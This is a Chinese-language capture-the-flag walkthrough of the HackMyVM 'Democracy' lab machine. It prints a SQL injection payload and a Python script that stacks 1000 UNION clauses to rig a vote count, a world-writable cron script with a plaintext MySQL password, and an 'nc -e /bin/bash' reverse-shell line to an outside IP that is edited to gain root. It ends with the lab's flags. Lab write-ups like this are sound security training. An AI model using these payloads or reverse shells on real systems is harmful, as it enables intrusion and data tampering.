HackMyVM-Democracy靶机详解WP

信息收集

服务探测

看到开放了80端口

❯ ip=192.168.56.109
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.109:80
Open 192.168.56.109:22
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 16:15 CST
Initiating Ping Scan at 16:15
Scanning 192.168.56.109 [4 ports]
Completed Ping Scan at 16:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:15
Completed Parallel DNS resolution of 1 host. at 16:15, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:15
Scanning 192.168.56.109 [2 ports]
Discovered open port 80/tcp on 192.168.56.109
Discovered open port 22/tcp on 192.168.56.109
Completed SYN Stealth Scan at 16:15, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.56.109
Host is up, received echo-reply ttl 63 (0.0012s latency).
Scanned at 2024-12-10 16:15:28 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

瞅了一眼好像是什么投票的，点击去投票，会有个登入框，既然有注册的功能那先注册好了

让你选举哪个党派吧，

首页就能看到哪个党派最先获得1000票才算获胜，手动创建1000个账户分别投票那是不太可能的

所以在投票的时候抓一下包看看能否修改，发现发包的时候会有一个参数请求

这里参考了其他师傅的WP，可以利用SQL注入来修改

candidate=democrat')+union+SELECT+1,"democrat"+--+-

使用联合查询将投票结果加一，利用python生成一千个，将结果复制到burpsuite放行拦截即可

#!/bin/python3

result = "democrat')+"

for i in range(1,1001):
   result = result + 'union+SELECT+'+str(i)+',"democrat"+'
result = result + "--+-"

print(result)

得到结果Done

我们再次扫描靶机端口可以发现多开放了一个ftp21端口

❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.109:21
Open 192.168.56.109:22
Open 192.168.56.109:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 16:55 CST
Initiating Ping Scan at 16:55
Scanning 192.168.56.109 [4 ports]
Completed Ping Scan at 16:55, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 192.168.56.109 [3 ports]
Completed SYN Stealth Scan at 16:55, 1.23s elapsed (3 total ports)
Nmap scan report for 192.168.56.109
Host is up, received echo-reply ttl 63 (0.00080s latency).
Scanned at 2024-12-10 16:55:06 CST for 1s

PORT   STATE    SERVICE REASON
21/tcp filtered ftp     no-response
22/tcp filtered ssh     no-response
80/tcp filtered http    no-response

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
           Raw packets sent: 10 (416B) | Rcvd: 1 (28B)

发现可以通过匿名用户登入上去Anonymous，有个votes的文件，使用get下载到kali

❯ ftp anonymous@$ip
Connected to 192.168.56.109.
220 ProFTPD Server (Debian) [::ffff:192.168.56.109]
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33883|)
150 Opening ASCII mode data connection for file list
-rwxrwxrwx   1 root     root          258 Apr 30  2023 votes
226 Transfer complete
ftp> get votes
local: votes remote: votes
229 Entering Extended Passive Mode (|||63117|)
150 Opening BINARY mode data connection for votes (258 bytes)
100% |*********************************************************************************************************|   258      211.90 KiB/s    00:00 ETA
226 Transfer complete
258 bytes received in 00:00 (97.46 KiB/s)
ftp>
ftp> quit
221 Goodbye.
❯ cat votes
#! /bin/bash

## this script runs every minute ##

#!/bin/bash

mysql -u root -pYklX69Vfa voting << EOF

SELECT COUNT(*) FROM votes WHERE candidate='republican';

SELECT COUNT(*) FROM votes WHERE candidate='democrat';

EOF

nc -e /bin/bash 192.168.0.29 4444

观察这个文件，发现这个脚本是定时执行的，每分钟执行一次，最后一行还有nc连接

把ip改为自己的尝试能否获得反弹shell

这里如果你使用的是WSL的Nat会反弹不到Shell

换成VMware里面的kali桥接virtual box的仅主机网卡

这样就能弹过了

Root提权

用户提权直接跳过，弹过来的shell就是root身份的，直接省去一步

稳定终端后直接读完事了

root@democracy:~# ls
root.txt  typescript
root@democracy:~# cat root.txt
081c1bc3fe537326ad7bcb8e571b1f5h
root@democracy:~# cat /home/trump/user.txt
399dba2fcf50acb2110f5e44380d20e4
root@democracy:~#

这个靶机关键的就是在投票那块，那块有其他更好的方案就不算难了